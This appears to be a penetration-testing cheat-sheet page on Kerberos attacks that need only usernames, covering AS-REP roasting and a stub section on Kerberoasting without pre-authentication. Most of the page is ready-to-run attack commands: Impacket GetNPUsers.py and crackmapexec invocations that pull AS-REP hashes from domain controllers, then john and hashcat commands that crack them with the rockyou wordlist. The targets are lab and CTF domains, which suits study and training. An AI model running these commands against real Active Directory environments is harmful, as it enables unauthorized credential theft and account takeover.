Kerberos Attack w/o password

Kerberos attack using username only. No credential is required.

ASREProast

AS-REP roasting is a technique that allows retrieving password hashes for users that have Do not require Kerberos preauthentication property selected.

Linux

# Get ASREProastable credentials
GetNPUsers.py rebound.htb/ -usersfile users-rebound.htb.txt -format john
GetNPUsers.py oscp.lab/ -usersfile usernames.txt -format hashcat
GetNPUsers.py brute.com/ -usersfile users-brute.com.txt -dc-ip 172.31.3.3 -format john
GetNPUsers.py blackfield.local/ -usersfile users-blackfield.local.txt  -dc-ip $RHOST -format john -outputfile ./hash-ASREP.txt

# users list dynamically queried with an LDAP anonymous bind
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'

# With crackmapexec 
crackmapexec ldap rebound.htb -u users.txt -p '' --asreproast hash-ASREP.txt

# Crack the hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash-ASREP.txt
hashcat -m 18200 -a 0 hash-ASREP.txt /usr/share/wordlists/rockyou.txt --show

Windows

Kerberoast w/o password

Kerberoast w/o pre-authentication

If an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won't be required).

Linux

Windows

PreviousInit Cred AcessNextPassword Attack

Last updated